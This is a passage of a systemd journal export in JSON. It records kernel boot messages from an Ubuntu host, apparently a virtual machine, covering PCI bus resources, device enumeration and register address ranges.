"_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "260055", "MESSAGE" : "acpiphp: Slot [31] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ec;b=e2b08827b5804427b422c10c84f1567e;m=558e04;t=5bd16dd190d6b;x=362eeb39cc63ada1", "__REALTIME_TIMESTAMP" : "1615280779890027", "__MONOTONIC_TIMESTAMP" : "5606916", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "262384", "MESSAGE" : "PCI host bridge to bus 0000:00" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ed;b=e2b08827b5804427b422c10c84f1567e;m=558e88;t=5bd16dd190df0;x=d8bbcd0964c6b88c", "__REALTIME_TIMESTAMP" : "1615280779890160", "__MONOTONIC_TIMESTAMP" : "5607048", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "264008", "MESSAGE" : "pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ee;b=e2b08827b5804427b422c10c84f1567e;m=558f03;t=5bd16dd190e6b;x=e61b00e29112adb0", "__REALTIME_TIMESTAMP" : "1615280779890283", "__MONOTONIC_TIMESTAMP" : "5607171", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : 
"0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "267267", "MESSAGE" : "pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ef;b=e2b08827b5804427b422c10c84f1567e;m=558f82;t=5bd16dd190eea;x=ac0fa8a1df325f3e", "__REALTIME_TIMESTAMP" : "1615280779890410", "__MONOTONIC_TIMESTAMP" : "5607298", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "268006", "MESSAGE" : "pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f0;b=e2b08827b5804427b422c10c84f1567e;m=558feb;t=5bd16dd190f52;x=8a9860fa2fdb0675", "__REALTIME_TIMESTAMP" : "1615280779890514", "__MONOTONIC_TIMESTAMP" : "5607403", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "271763", "MESSAGE" : "pci_bus 0000:00: root bus resource [mem 0x80000000-0xfebfffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f1;b=e2b08827b5804427b422c10c84f1567e;m=559089;t=5bd16dd190ff1;x=ca588a5d05c5e3a", "__REALTIME_TIMESTAMP" : "1615280779890673", "__MONOTONIC_TIMESTAMP" : "5607561", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", 
"_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "272007", "MESSAGE" : "pci_bus 0000:00: root bus resource [mem 0x100000000-0x17fffffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f2;b=e2b08827b5804427b422c10c84f1567e;m=559118;t=5bd16dd19107f;x=248c379e0cd43533", "__REALTIME_TIMESTAMP" : "1615280779890815", "__MONOTONIC_TIMESTAMP" : "5607704", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "275812", "MESSAGE" : "pci_bus 0000:00: root bus resource [bus 00-ff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f3;b=e2b08827b5804427b422c10c84f1567e;m=5591da;t=5bd16dd191141;x=ecd27e88c67f76bf", "__REALTIME_TIMESTAMP" : "1615280779891009", "__MONOTONIC_TIMESTAMP" : "5607898", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:00.0", "_UDEV_SYSNAME" : "0000:00:00.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "276064", "MESSAGE" : "pci 0000:00:00.0: [8086:1237] type 00 class 0x060000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f4;b=e2b08827b5804427b422c10c84f1567e;m=55d23a;t=5bd16dd1951a2;x=9ccf81605d5f9c41", "__REALTIME_TIMESTAMP" : "1615280779907490", "__MONOTONIC_TIMESTAMP" : "5624378", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.0", "_UDEV_SYSNAME" : 
"0000:00:01.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "276813", "MESSAGE" : "pci 0000:00:01.0: [8086:7000] type 00 class 0x060100" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f5;b=e2b08827b5804427b422c10c84f1567e;m=55d2d6;t=5bd16dd19523d;x=60d223400918274a", "__REALTIME_TIMESTAMP" : "1615280779907645", "__MONOTONIC_TIMESTAMP" : "5624534", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "277719", "MESSAGE" : "pci 0000:00:01.1: [8086:7010] type 00 class 0x010180" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f6;b=e2b08827b5804427b422c10c84f1567e;m=55d372;t=5bd16dd1952d9;x=dd7e66bae818543a", "__REALTIME_TIMESTAMP" : "1615280779907801", "__MONOTONIC_TIMESTAMP" : "5624690", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "280911", "MESSAGE" : "pci 0000:00:01.1: reg 0x20: [io 0xc0c0-0xc0cf]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f7;b=e2b08827b5804427b422c10c84f1567e;m=55d435;t=5bd16dd19539d;x=f8e2ac9466ff5f98", "__REALTIME_TIMESTAMP" : "1615280779907997", "__MONOTONIC_TIMESTAMP" : "5624885", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "282217", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f8;b=e2b08827b5804427b422c10c84f1567e;m=55d4e3;t=5bd16dd19544a;x=a17099c37dea2ab9", "__REALTIME_TIMESTAMP" : "1615280779908170", "__MONOTONIC_TIMESTAMP" : "5625059", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "284007", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f9;b=e2b08827b5804427b422c10c84f1567e;m=55d569;t=5bd16dd1954d0;x=3778f35692f3b203", "__REALTIME_TIMESTAMP" : "1615280779908304", "__MONOTONIC_TIMESTAMP" : "5625193", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "287935", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fa;b=e2b08827b5804427b422c10c84f1567e;m=55d5fe;t=5bd16dd195566;x=7a2bf3739926c36d", "__REALTIME_TIMESTAMP" : "1615280779908454", "__MONOTONIC_TIMESTAMP" : "5625342", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : 
"0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "288006", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fb;b=e2b08827b5804427b422c10c84f1567e;m=55d683;t=5bd16dd1955ea;x=3ea7c3e0f893caac", "__REALTIME_TIMESTAMP" : "1615280779908586", "__MONOTONIC_TIMESTAMP" : "5625475", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "291842", "MESSAGE" : "pci 0000:00:01.2: [8086:7020] type 00 class 0x0c0300" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fc;b=e2b08827b5804427b422c10c84f1567e;m=55d6fc;t=5bd16dd195664;x=cc7b8675d98e90b5", "__REALTIME_TIMESTAMP" : "1615280779908708", "__MONOTONIC_TIMESTAMP" : "5625596", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "294288", "MESSAGE" : "pci 0000:00:01.2: reg 0x20: [io 0xc080-0xc09f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fd;b=e2b08827b5804427b422c10c84f1567e;m=55d775;t=5bd16dd1956dd;x=bb7c0f76dca68866", "__REALTIME_TIMESTAMP" : "1615280779908829", "__MONOTONIC_TIMESTAMP" : "5625717", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.3", "_UDEV_SYSNAME" : "0000:00:01.3", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "295835", "MESSAGE" : "pci 0000:00:01.3: [8086:7113] type 00 class 0x068000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fe;b=e2b08827b5804427b422c10c84f1567e;m=55d831;t=5bd16dd195799;x=4a4b68dabe7c021a", "__REALTIME_TIMESTAMP" : "1615280779909017", "__MONOTONIC_TIMESTAMP" : "5625905", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.3", "_UDEV_SYSNAME" : "0000:00:01.3", "_SOURCE_MONOTONIC_TIMESTAMP" : "296549", "MESSAGE" : "pci 0000:00:01.3: quirk: [io 0x0600-0x063f] claimed by PIIX4 ACPI" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ff;b=e2b08827b5804427b422c10c84f1567e;m=55d8b5;t=5bd16dd19581d;x=4f9eb59d248eeca9", "__REALTIME_TIMESTAMP" : "1615280779909149", "__MONOTONIC_TIMESTAMP" : "5626037", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.3", "_UDEV_SYSNAME" : "0000:00:01.3", "_SOURCE_MONOTONIC_TIMESTAMP" : "300020", "MESSAGE" : "pci 0000:00:01.3: quirk: [io 0x0700-0x070f] claimed by PIIX4 SMB" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=100;b=e2b08827b5804427b422c10c84f1567e;m=55f34b;t=5bd16dd1972b2;x=9672743b62d46b09", "__REALTIME_TIMESTAMP" : "1615280779915954", "__MONOTONIC_TIMESTAMP" : "5632843", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "304343", "MESSAGE" : "pci 0000:00:02.0: [1013:00b8] type 00 class 0x030000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=101;b=e2b08827b5804427b422c10c84f1567e;m=55f3d4;t=5bd16dd19733b;x=dad091db668fefa1", "__REALTIME_TIMESTAMP" : "1615280779916091", "__MONOTONIC_TIMESTAMP" : "5632980", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "306361", "MESSAGE" : "pci 0000:00:02.0: reg 0x10: [mem 0xfc000000-0xfdffffff pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=102;b=e2b08827b5804427b422c10c84f1567e;m=55f460;t=5bd16dd1973c7;x=b848ec1593b0e0b2", "__REALTIME_TIMESTAMP" : "1615280779916231", "__MONOTONIC_TIMESTAMP" : "5633120", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "307479", "MESSAGE" : "pci 0000:00:02.0: reg 0x14: [mem 0xfeb90000-0xfeb90fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=103;b=e2b08827b5804427b422c10c84f1567e;m=55f4d9;t=5bd16dd197440;x=cd2a284651410bdd", "__REALTIME_TIMESTAMP" : "1615280779916352", "__MONOTONIC_TIMESTAMP" : "5633241", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "315528", "MESSAGE" : "pci 0000:00:02.0: reg 0x30: [mem 0xfeb80000-0xfeb8ffff pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=104;b=e2b08827b5804427b422c10c84f1567e;m=55ff5b;t=5bd16dd197ec3;x=d559f12bdc4d3a18", "__REALTIME_TIMESTAMP" : "1615280779919043", "__MONOTONIC_TIMESTAMP" : "5635931", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "316278", "MESSAGE" : "pci 0000:00:03.0: [1af4:1000] type 00 class 0x020000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=105;b=e2b08827b5804427b422c10c84f1567e;m=560065;t=5bd16dd197fcd;x=c1318bc350a41dce", "__REALTIME_TIMESTAMP" : "1615280779919309", "__MONOTONIC_TIMESTAMP" : "5636197", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "318019", "MESSAGE" : "pci 0000:00:03.0: reg 0x10: [io 0xc000-0xc03f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=106;b=e2b08827b5804427b422c10c84f1567e;m=560c8d;t=5bd16dd198bf5;x=3790925f3d37d293", "__REALTIME_TIMESTAMP" : "1615280779922421", "__MONOTONIC_TIMESTAMP" : "5639309", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "319363", "MESSAGE" : "pci 0000:00:03.0: reg 0x14: [mem 0xfeb91000-0xfeb91fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=107;b=e2b08827b5804427b422c10c84f1567e;m=561022;t=5bd16dd198f8a;x=9a96e7085dc5526d", "__REALTIME_TIMESTAMP" : "1615280779923338", "__MONOTONIC_TIMESTAMP" : "5640226", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "324685", "MESSAGE" : "pci 0000:00:03.0: reg 0x20: [mem 0xfe000000-0xfe003fff 64bit pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=108;b=e2b08827b5804427b422c10c84f1567e;m=5610ab;t=5bd16dd199012;x=258d5893ee7cb072", "__REALTIME_TIMESTAMP" : "1615280779923474", "__MONOTONIC_TIMESTAMP" : "5640363", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "325809", "MESSAGE" : "pci 0000:00:03.0: reg 0x30: [mem 0xfeb00000-0xfeb7ffff pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=109;b=e2b08827b5804427b422c10c84f1567e;m=56145b;t=5bd16dd1993c3;x=a445db786e25b7ff", "__REALTIME_TIMESTAMP" : "1615280779924419", "__MONOTONIC_TIMESTAMP" : "5641307", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : 
"0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "326787", "MESSAGE" : "pci 0000:00:04.0: [1af4:1001] type 00 class 0x010000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10a;b=e2b08827b5804427b422c10c84f1567e;m=5614e0;t=5bd16dd199447;x=953a051cf3c0a2f0", "__REALTIME_TIMESTAMP" : "1615280779924551", "__MONOTONIC_TIMESTAMP" : "5641440", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "328007", "MESSAGE" : "pci 0000:00:04.0: reg 0x10: [io 0xc040-0xc07f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10b;b=e2b08827b5804427b422c10c84f1567e;m=56155a;t=5bd16dd1994c1;x=eca6999d82627363", "__REALTIME_TIMESTAMP" : "1615280779924673", "__MONOTONIC_TIMESTAMP" : "5641562", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "329720", "MESSAGE" : "pci 0000:00:04.0: reg 0x14: [mem 0xfeb92000-0xfeb92fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10c;b=e2b08827b5804427b422c10c84f1567e;m=5615d1;t=5bd16dd199538;x=b23315038c74e053", "__REALTIME_TIMESTAMP" : "1615280779924792", "__MONOTONIC_TIMESTAMP" : "5641681", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", 